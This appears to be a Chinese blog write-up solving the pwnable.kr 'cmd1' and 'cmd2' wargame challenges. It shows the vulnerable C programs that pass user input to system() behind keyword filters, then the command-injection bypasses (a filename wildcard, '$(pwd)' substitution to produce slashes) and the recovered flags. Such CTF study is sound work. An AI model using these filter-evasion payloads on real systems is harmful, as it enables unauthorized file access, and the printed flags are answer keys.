pwnable.kr 之 cmd

发表于 | 分类于

cmd1

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
#include <stdio.h>
#include <string.h>

int filter(char* cmd){
        int r=0;
        r += strstr(cmd, "flag")!=0;
        r += strstr(cmd, "sh")!=0;
        r += strstr(cmd, "tmp")!=0;
        return r;
}
int main(int argc, char* argv[], char** envp){
        putenv("PATH=/thankyouverymuch");
        if(filter(argv[1])) return 0;
        system( argv[1] );
        return 0;
}

filter函数,要求输入的第二个参数不能含有”flag”,”sh”,”tmp”字符串

linux支持熊本符*

所以./cmd1 "/bin/cat ./f*"

1
2
cmd1@pwnable:~$ ./cmd1 "/bin/cat ./f*"
mommy now I get what PATH environment is for :)

cmd2

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
#include <stdio.h>
#include <string.h>

int filter(char* cmd){
        int r=0;
        r += strstr(cmd, "=")!=0;
        r += strstr(cmd, "PATH")!=0;
        r += strstr(cmd, "export")!=0;
        r += strstr(cmd, "/")!=0;
        r += strstr(cmd, "`")!=0;
        r += strstr(cmd, "flag")!=0;
        return r;
}

extern char** environ;
void delete_env(){
        char** p;
        for(p=environ; *p; p++) memset(*p, 0, strlen(*p));
}

int main(int argc, char* argv[], char** envp){
        delete_env();
        putenv("PATH=/no_command_execution_until_you_become_a_hacker");
        if(filter(argv[1])) return 0;
        printf("%s\n", argv[1]);
        system( argv[1] );
        return 0;
}

相比cmd1过滤了/,如何构造出/成了重点,通过尝试,发现system函数是可以执行pwd命令的

1
2
3
pwnable% ./cmd2 pwd
pwd
/home/cmd2

linux下/代表的是根目录,所以只需要在根目录下,pwd就等于是/,这样/就有了,但是不能直接把pwd放进去,要把它包装成一个变量,也就是$(pwd)

1
2
3
pwnable% ./home/cmd2/cmd2 '$(pwd)bin$(pwd)cat $(pwd)home$(pwd)cmd2$(pwd)fl*'
$(pwd)bin$(pwd)cat $(pwd)home$(pwd)cmd2$(pwd)fl*
FuN_w1th_5h3ll_v4riabl3s_haha
0%